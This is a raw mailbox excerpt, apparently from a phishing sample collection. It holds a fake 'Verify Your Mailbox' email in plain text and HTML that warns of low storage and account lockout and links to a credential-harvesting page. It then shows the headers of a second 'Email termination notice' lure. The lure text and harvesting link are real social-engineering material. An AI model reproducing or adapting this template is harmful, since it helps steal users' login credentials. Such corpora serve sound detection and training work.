From: ''Account Update'' <admin@socialbenessere.it>
Date: Wed, 28 Sep 2016 16:25:02 +0700
Status: O
X-Status: 
X-Keywords:                  
X-UID: 375

You will not see this in a MIME-aware mail reader.
--===============2107508434==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

  =

 =

    	  =

    	 =

   =

   Verify Your Mailbox 	 =

   	 =

   	 =

   =

   Dear jose@monkey.org,  Your e-mail account is running on a low storage s=
pace, verify your account now to upgrade storage space, other wise your acc=
ount shall be locked out. 	 =

   	 =

   	 =

   Click here to verify your account 	 =

   	 =

   	 =

   	 =

  =20
--===============2107508434==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html>
<head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf=
-8"/>
	<title></title>
</head>
<body>
<p><br />
&nbsp;</p>

<table>
	<tbody>
		<tr>
			<td width=3D"30">&nbsp;</td>
			<td>
			<table align=3D"center" cellspacing=3D"0" style=3D"BORDER-TOP: #a4a4a4 2=
px solid; BORDER-RIGHT: #a4a4a4 2px solid; BORDER-BOTTOM: #a4a4a4 2px solid=
; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: #a=
4a4a4 2px solid; PADDING-RIGHT: 0px; -moz-box-shadow: 6px 6px 12px #888; -w=
ebkit-box-shadow: 6px 6px 12px #888; box-shadow: 6px 6px 12px #888; border-=
radius: 6px; -moz-border-radius: 6px" width=3D"500">
				<tbody>
					<tr>
						<td height=3D"40">&nbsp;</td>
					</tr>
					<tr>
						<td>
						<table align=3D"center" width=3D"460">
							<tbody>
								<tr>
									<td><font face=3D"calibri" size=3D"+3">Verify Your Mailbox </font>=
</td>
								</tr>
							</tbody>
						</table>
						</td>
					</tr>
					<tr>
						<td height=3D"20">&nbsp;</td>
					</tr>
					<tr>
						<td>
						<table align=3D"center" width=3D"460">
							<tbody>
								<tr>
									<td><font face=3D"calibri" size=3D"3">Dear jose@monkey.org, </font>
									<div class=3D"yiv2486292201" style=3D"FONT-SIZE: 24px; COLOR: rgb(=
68,68,68); font-stretch: normal;"><span style=3D"font-size:14px;">Your e-ma=
il account is running on a low storage space, verify your account now to up=
grade storage space, other wise your</span><span style=3D"font-size:14px;">=
 account shall be locked out.</span></div>
									</td>
								</tr>
							</tbody>
						</table>
						</td>
					</tr>
					<tr>
						<td height=3D"20">&nbsp;</td>
					</tr>
					<tr>
						<td bgcolor=3D"#585858" height=3D"60">
						<div align=3D"center"><a href=3D"http://assemany.com/site/saver/pssss=
/auth/aut.php?email=3Djose@monkey.org" style=3D"TEXT-DECORATION: none"><fon=
t color=3D"#ffffff" face=3D"verdana"><b>Click here to verify your account</=
b></font></a></div>
						</td>
					</tr>
					<tr>
						<td height=3D"20">&nbsp;</td>
					</tr>
					<tr>
						<td height=3D"40">&nbsp;</td>
					</tr>
				</tbody>
			</table>
			</td>
		</tr>
	</tbody>
</table>
</body>
</html>

--===============2107508434==--

From jose@monkey.org Thu Sep 29 02:39:27 2016 +0000
Return-Path: admin@mail.com
Delivered-To: jose@monkey.org
X-FDA: 72012865974.04.oven82_6f8f847292916
X-Spam-Summary: 50,0,0,d315405c913a45ef,d41d8cd98f00b204,admin@mail.com,:,RULES_HIT:41:72:355:379:474:495:800:962:967:969:973:978:983:988:989:1189:1208:1221:1260:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1542:1559:1575:1588:1589:1592:1594:1711:1714:1730:1748:1777:1792:1803:2525:2527:2560:2563:2682:2685:2693:2859:2890:2896:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3038:3138:3139:3140:3141:3142:3148:3622:3690:3740:3867:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4552:5007:6261:6650:6678:6684:6688:8583:8603:8885:8987:9025:9059:9388:9411:9468:9908:10004:10049:10346:10400:10482:11473:11658:11914:12043:12438:12523:12660:12740:12764:13025:13139:13199:13229:13237:13439:13975:14093:14094:14096:14181:14687:14721:14828:14849:19901:19997:21062:21080:21325:21433:21450:21451:30001:30021:30022:30026:30051:30054:30070,0,RBL:219.94.155.93:@mail.com:.lbl8.mailshell.net-62.20.10.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,Domain
X-HE-Tag: oven82_6f8f847292916
X-Filterd-Recvd-Size: 4675
Received: from www233b.sakura.ne.jp (www233b.sakura.ne.jp [219.94.155.93])
	by imf26.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 29 Sep 2016 02:39:26 +0000 (UTC)
Received: from IP-220-117.dataclub.biz (ip-220-117.dataclub.biz [46.183.220.117] (may be forged))
	(authenticated bits=0)
	by www233b.sakura.ne.jp (8.14.5/8.14.5) with ESMTP id u8T2YX4X001109
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO)
	for <jose@monkey.org>; Thu, 29 Sep 2016 11:39:23 +0900 (JST)
	(envelope-from admin@mail.com)
Message-Id: <201609290239.u8T2YX4X001109@www233b.sakura.ne.jp>
Content-Type: multipart/alternative; boundary="===============1957161725=="
MIME-Version: 1.0
Subject: Email termination notice for jose@monkey.org
To: jose@monkey.org
